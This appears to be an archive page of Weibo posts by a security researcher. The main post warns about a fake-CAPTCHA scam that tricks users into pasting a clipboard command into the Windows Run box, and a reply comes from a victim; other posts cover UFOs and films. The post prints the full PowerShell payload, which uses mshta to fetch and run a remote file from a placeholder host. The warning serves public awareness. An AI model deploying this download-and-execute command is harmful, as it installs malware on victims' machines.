• 邮件反馈
  • 支持 TK
  • 微博

    • 看看最新
    • 随便看看
    • 过去一周
    • 过去一年
  • 精选

    • 净想好事
    • 安全合辑
    • 疫苗合辑
    • 读书合辑
  • 文档

    • 搜索说明
    • 百元好物
    • tk猴子

  • 支持
上个页面看看最新
下个页面过去一周

© Copyright 2025. All rights reserved.

加入tk真爱粉群
t0mbkeeper

2025-02-13 17:44

受害者现身说法……//@MZK豆豆:前几个月找油管下载脑袋发抽中招过,powershell远程下载了一个txt,里边有执行文件,一通找到运行程序位置和启动项,可惜还是密码泄露,PayPal盗刷了,申诉找回了。这种火绒扫不出来,真是坑

t0mbkeeper

2025-02-13 16:52

现在黑产有一种新的社交工程学挂马方案。

你访问一些网站的时候,网页忽然弹出提示,让你证明自己是真人。这倒也很常见,于是你点了一下那个验证窗口,又弹出提示,让你按 Win+R,然后 Ctrl+V,再回车(图一)。

你按下 Win+R,发现弹出一个窗口。再按 Ctrl+V,窗口里出现了:✅ 'I am not a robot: CAPTCHA Verification UID: 7811'(图二)。这好像真的是在做验证。但这时只要你再按一下回车,你的电脑就会下载并执行攻击者的木马。

因为在你最开始点击那个验证窗口的时候,网站向你的剪贴板中写入的内容实际是:

powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'

这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限,对过长的输入行只显示末尾部分。攻击者精确地控制内容长度,巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候,已经晚了。

图三显然是一个受害者。

阅读全文 >
阅读全文 >
t0mbkeeper

2024-04-04 16:01

回复@Tenacious_U:不能跟马亲王比。我永远练不成他那样的本事。//@Tenacious_U:有趣,虽然我不喝酒,但这一刻体会到了老酒鬼抿了一口好酒后反复咂摸味儿的的快乐。另外,文风有点马亲王的味道

t0mbkeeper

2024-04-04 09:57

《小明的清明》🔗网页链接

阅读全文 >
阅读全文 >
tombkeeper

2023-07-23 21:45

现在年轻人对蔡澜的印象主要是吃吃喝喝。

《满清十大酷刑》《聊斋艳谭》《聊斋艳谭之五通神》《灯草和尚》,香港这几部著名黄片都是他出品的。《力王》也是。

阅读全文 >
tombkeeper

2023-07-27 17:34

要说外星人,迄今为止最强的证据还是这个:

tombkeeper

2019-09-18 12:13

美国海军发言人约瑟夫·格拉德舍尔承认网上流传的三段 UFO 视频是真的——确实有飞行物进入了美国领空,而且海军不知道那是什么东西。

这些视频由安装在 F-18 机炮上的摄像机拍摄。其中一段拍摄于 2004 年 11 月 14 日。另外两段拍摄于 2015 年 1 月 21 日。三段视频都拍到了以极高速飞行的未知物体。 🔗tombkeeper的微博视频

阅读全文 >
阅读全文 >
tombkeeper

2012-07-03 12:44

回复@王喆ACN: 官僚问题,基本和企业大小成正比,倒不奇怪。我这里说的不是官僚问题,而是看待问题上积极向组织靠拢这一点。 //@王喆ACN:接触过不少外企里的国企,官僚不输纯正国企,不知是淮北为枳,还是淮南原本也不为橘

tombkeeper

2012-07-03 12:24

曾听人说很多国外巨型企业的中国公司,内部很像国企。后来发现这类企业里的不少人,居然也很体制内,并没有因为在洋老板治下就被资产阶级自由化思想侵蚀。这是个很有趣的现象。

阅读全文 >
阅读全文 >
1
...
5884.45885.4
5886.4
5887.45888.4
...
6190